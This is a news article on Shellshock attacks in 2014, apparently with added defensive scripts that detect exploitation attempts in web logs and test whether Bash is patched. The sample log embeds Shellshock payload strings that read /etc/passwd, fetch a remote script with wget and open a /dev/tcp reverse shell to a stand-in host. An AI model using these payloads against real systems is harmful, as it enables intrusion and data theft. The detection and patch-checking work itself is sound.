Attacks against Shellshock continue as updated patches hit the Web

Beginning Thursday, several security firms reported a sharp uptick in attacks leveraging the recently disclosed vulnerability in GNU Bash (CVE-2014-6271), widely known as Shellshock.

On Friday, AlienVault Labs reported that the flaw was being used by two attackers to install two different pieces of malware on victim systems. One payload joins the victim's system to a botnet which, based on traffic in its IRC channel, is likely run by a group out of Romania. The other fingerprints the victim's system and opens a backdoor, enabling remote access.

Security firm Incapsula reported that it had observed more than 17,000 attacks (an average of 725 per hour) since Shellshock was disclosed on Wednesday.

In a blog post, the company says that more than 1,800 domains have been targeted and that the attacks originate from roughly 400 IP addresses, the majority of them assigned to systems in China and the U.S.

"What we are seeing here are hackers using existing botnets to create new ones: running automated scripts from compromised servers to add more hijacked machines to their flock. During the last 24 hours we saw several botnet shepherds using repurposed DDoS bots in an attempt to exploit the Shellshock vulnerability to gain server access," Incapsula's post explained.

Researchers at Trend Micro have documented several attacks since Friday, including the botnet activity reported by AlienVault and Incapsula. Later in the day they also detected a DDoS attack launched from servers that appear to have been compromised through Shellshock (based on the code running on them). Trend also disclosed that several official institutions in Brazil were being targeted by scanners probing for Shellshock-related openings.

"It does not seem to have any real payload or to be doing any real damage, however, only taking what appears to be information about the systems it's trying to infiltrate -- but in the world of cybercrime and cyber attacks, that may change soon enough. We believe that the information-gathering could be a sign of preparation for a bigger, much more damaging attack," Trend said of the scans in Brazil.

On Saturday, FireEye released details on several proof-of-concept scripts related to Shellshock which, in theory, would allow an attacker to perform a number of tasks, including click fraud, establishing a reverse shell (with or without Perl), email reconnaissance, capturing the system's /etc/passwd account file, botnet creation (several variants), and UDP floods.

"We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it's only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise," FireEye wrote.
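The campaigns described above reached web servers by placing the Bash function-definition trigger in HTTP request fields handed to CGI scripts: Bash 4.3 and earlier imported any environment value starting with the exact four bytes "() {" as a function and executed whatever followed the function body. The script below is an added example, not code from the article or from AlienVault, Incapsula, Trend Micro or FireEye; it pulls such attempts out of a web server access log and extracts the command the attacker tried to run. The log lines, IP addresses and function names are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the article or any vendor it cites): pick
# Shellshock exploitation attempts out of a web server access log.
# The detection anchor is the Bash function-definition prefix "() {",
# which no legitimate User-Agent, Referer or URL should ever contain.

# Constructed sample lines in Apache/nginx "combined" format (not real
# traffic; addresses come from the RFC 5737 documentation ranges).
SAMPLE_LOG='203.0.113.7 - - [26/Sep/2014:10:15:32 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"cat /etc/passwd\""
198.51.100.3 - - [26/Sep/2014:10:15:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [26/Sep/2014:10:16:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { :;}; /usr/bin/wget -O /tmp/x http://198.51.100.77/x.sh" "curl/7.37.0"
192.0.2.5 - - [26/Sep/2014:10:16:10 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.7 - - [26/Sep/2014:10:16:21 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "-" "() { :;}; /bin/bash -i >& /dev/tcp/198.51.100.77/4444 0>&1"'

# Regex for the trigger. The Bash importer only honoured "() {" with a
# single space, but whitespace is relaxed here so sloppy scanner variants
# are surfaced for review as well.
TRIGGER='\(\)[[:space:]]*\{'

# shellshock_hits LOG: print every line carrying the trigger anywhere in
# it (request line, Referer or User-Agent). Always exits 0.
shellshock_hits() {
    printf '%s\n' "$1" | grep -E "$TRIGGER" || true
}

# shellshock_hit_count LOG: number of matching lines.
shellshock_hit_count() {
    shellshock_hits "$1" | grep -c .
}

# shellshock_sources LOG: distinct client addresses behind the attempts,
# one per line, sorted; suitable for a blocklist or for enrichment.
shellshock_sources() {
    shellshock_hits "$1" | awk '{ print $1 }' | sort -u
}

# shellshock_payloads LOG: the command that follows the function body,
# i.e. what an unpatched Bash would have executed. Strips everything up
# to and including the closing "};" and the log line's trailing quote.
shellshock_payloads() {
    shellshock_hits "$1" | sed -e 's/^.*()[[:space:]]*{[^}]*};[[:space:]]*//' -e 's/"$//'
}

# Stand-alone run: summarise the constructed sample.
echo "Shellshock attempts: $(shellshock_hit_count "$SAMPLE_LOG")"
echo "Sources:"
shellshock_sources "$SAMPLE_LOG"
echo "Payloads:"
shellshock_payloads "$SAMPLE_LOG"
```

Run it against a real log with `shellshock_hits "$(cat /var/log/apache2/access.log)"` or adapt the functions to read a file. Note that the extracted payloads (reading /etc/passwd, fetching a second-stage script, opening a reverse shell to a remote port) correspond to the proof-of-concept tasks FireEye lists above, which is why the payload field, not just the hit count, is worth feeding into triage.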

When Shellshock was disclosed on Wednesday, nearly all Linux and UNIX distributions released fixes for the problem. However, researchers quickly determined that the initial fix was incomplete, leaving patched systems exposed to variations on the original attack vector.

This led to the publication of four additional CVE advisories (CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, and CVE-2014-6277). Administrators and system operators are encouraged to update GNU Bash with all of the latest fixes and to apply additional patches as they are released; so far there have been three updates to GNU Bash since the problem was publicly disclosed.
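Because the first fix was incomplete, "patched" is something to verify rather than assume. The script below is an added example, not code from the article or from the Bash project; it wraps the widely published one-line probes for CVE-2014-6271 and for CVE-2014-7169 (the parser bug that survived the first fix) so the verdict can be consumed by a script. The function names are this example's own, and the remaining three CVEs listed above are not probed.

```shell
#!/bin/sh
# Added example (not from the article or the Bash maintainers): probe a
# Bash binary for CVE-2014-6271 and CVE-2014-7169 and report a verdict.
# Usage: ./shellshock-check.sh [path-or-name-of-bash]   (default: bash)

# bash_6271 BASH_BIN: prints "vulnerable" if the binary executes the
# command trailing an exported function body, otherwise "patched".
# An unpatched Bash imports any variable whose value starts with "() {"
# as a function and runs "echo vulnerable" while doing so; a fixed Bash
# treats x as an ordinary string and only prints "probe".
bash_6271() {
    if env x='() { :;}; echo vulnerable' "$1" -c 'echo probe' 2>/dev/null | grep -q '^vulnerable$'; then
        echo vulnerable
    else
        echo patched
    fi
}

# bash_7169 BASH_BIN: the parser bug left after the first fix. In an
# affected Bash the dangling "=>\" leaks into parsing of the -c command,
# so "echo date" becomes a redirection: "date" runs and its output lands
# in a file named "echo" in the working directory. The probe runs in a
# scratch directory and prints "vulnerable" if that file appears.
bash_7169() {
    dir=$(mktemp -d) || { echo error; return; }
    ( cd "$dir" && env X='() { (a)=>\' "$1" -c 'echo date' >/dev/null 2>&1 )
    if [ -f "$dir/echo" ]; then echo vulnerable; else echo patched; fi
    rm -rf "$dir"
}

# shellshock_verdict BASH_BIN: one "CVE status" line per probe, or the
# single word "unavailable" when the binary cannot be found, so the check
# degrades cleanly on hosts or containers that carry no Bash at all.
shellshock_verdict() {
    bin=${1:-bash}
    if ! command -v "$bin" >/dev/null 2>&1; then
        echo unavailable
        return
    fi
    echo "CVE-2014-6271 $(bash_6271 "$bin")"
    echo "CVE-2014-7169 $(bash_7169 "$bin")"
}

shellshock_verdict "${1:-bash}"
```

Run it against every Bash on a host, not just the one in PATH: statically linked copies in chroots, container images and appliance firmware are the ones that tend to miss distribution updates, and a fixed `/bin/bash` says nothing about them.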

Finally, Apple addressed Shellshock in a statement this weekend, noting that a "vast majority" of OS X users were not at risk because OS X systems were "safe by default and not exposed to remote exploits of [GNU Bash] unless users configure advanced UNIX services."

For those with advanced services enabled, Apple is working on an update.
